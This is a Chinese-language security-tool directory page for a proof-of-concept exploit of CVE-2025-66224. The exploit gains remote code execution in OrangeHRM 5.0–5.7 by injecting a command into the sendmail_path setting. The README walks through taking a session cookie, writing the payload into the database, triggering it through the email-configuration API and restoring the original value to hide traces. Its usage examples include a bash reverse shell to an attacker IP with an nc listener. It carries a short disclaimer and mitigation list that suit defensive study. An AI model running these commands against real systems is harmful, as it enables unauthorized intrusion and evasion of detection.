Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PoC-CVE-2025-66224 — CVE-2025-66224 的概念验证漏洞利用程序,通过在 sendmail_path 参数中实施命令注入,在 OrangeHRM 中实现远程代码执行,并具备自动数据库载荷注入与清理功能。 | Kitploit
工具/GitHubGitHub/richard-natan/poc-cve-2025-66224
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育数据库安全
GitHubrichard-natan/poc-cve-2025-66224

PoC-CVE-2025-66224

CVE-2025-66224 的概念验证漏洞利用程序,通过在 sendmail_path 参数中实施命令注入,在 OrangeHRM 中实现远程代码执行,并具备自动数据库载荷注入与清理功能。

查看仓库
289个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

OrangeHRM RCE 漏洞利用工具 - CVE-2025-66224

📋 描述

本概念验证(PoC)演示了 OrangeHRM 中的一个远程代码执行(RCE)漏洞,该漏洞通过 sendmail_path 配置参数中的命令注入实现。

该利用工具的工作原理:

  1. 将恶意载荷注入 MySQL 数据库(hs_hr_config 表)
  2. 通过邮件配置 API 端点触发载荷执行
  3. 自动恢复原始值以清理痕迹

🎯 受影响版本

  • OrangeHRM 5.0 至 5.7 版本

⚠️ 免责声明

此工具仅用于教育和授权的安全测试目的。未经授权访问计算机系统是非法的。作者不对因使用此工具造成的任何误用或损害负责。

🔧 依赖安装

pip install requests mysql-connector-python

📦 安装

git clone https://github.com/richard-natan/PoC-CVE-2025-66224
cd PoC-CVE-2025-66224
pip install -r requirements.txt

🚀 使用方法

步骤 1:获取会话 Cookie

  1. 通过 Web 界面登录 OrangeHRM
  2. 打开浏览器开发者工具(F12)
  3. 导航至 存储 > Cookie(Firefox)或 应用程序 > Cookie(Chrome)
  4. 复制 _orangehrm Cookie 值

步骤 2:运行利用工具

python3 exploit.py -t <目标URL> -c <COOKIE值> \
    -dh <MYSQL主机> -du <MYSQL用户> -dp <MYSQL密码> \
    -cmd '<要执行的命令>'

示例 - 简单命令

python3 exploit.py -t http://127.0.0.1:8080/ \
    -c "g58tak8pbnheseatv6dggvi31i" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd "touch /tmp/pwned"

示例 - 反弹 Shell

# 在攻击机启动监听
nc -lvnp 4444

# 使用反弹 Shell 载荷执行利用
python3 exploit.py -t http://target.com/ \
    -c "your_session_cookie" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd 'bash -c "bash -i >& /dev/tcp/攻击机IP/4444 0>&1"'

📝 参数

参数缩写必需描述
--target-t✅目标 URL(例如 http://target.com)
--cookie-c✅会话 Cookie 值
--cookie_name-cn❌Cookie 名称(默认:_orangehrm)
--command-cmd✅在目标上执行的命令
--db_host-dh✅MySQL 主机地址
--db_user-du✅MySQL 用户名
--db_pass-dp✅MySQL 密码
--db_port-dport❌MySQL 端口(默认:3306)

🔍 工作原理

漏洞详情

该漏洞存在于邮件配置功能中,其中 sendmail_path 参数存储在数据库中,随后在未经适当清理的情况下被执行。

利用流程:

1. 认证到 OrangeHRM(获取有效会话 Cookie)
   ↓
2. 连接 MySQL 数据库
   ↓
3. 定位 hs_hr_config 表
   ↓
4. 更新 email_config.sendmail_path 值:
   从:/usr/sbin/sendmail -bs
   改为:/usr/sbin/sendmail -bs && <载荷> #
   ↓
5. 通过 API 触发执行:
   PUT /web/index.php/api/v2/admin/email-configuration
   ↓
6. 命令在服务器上执行
   ↓
7. 恢复原始值(清理)

技术细节

漏洞参数: email_config.sendmail_path

数据库:

  • 表:hs_hr_config
  • 列:name = 'email_config.sendmail_path'
  • 列:value = sendmail 命令路径

触发端点:

PUT /web/index.php/api/v2/admin/email-configuration

🛡️ 缓解措施

  1. 输入验证: 对 sendmail_path 参数实施严格验证
  2. 转义处理: 在命令执行前正确转义 Shell 命令
  3. 最小权限: 以最小权限运行 Web 服务器
  4. 更新: 应用 OrangeHRM 的最新安全补丁

🤝 致谢

PoC 作者: RiccK

团队: Bypassadores && HackersOnSteroids

🔗 参考链接

  • CVE-2025-66224

⚠️ 请负责任地使用。在测试前务必获得适当授权。

下载工具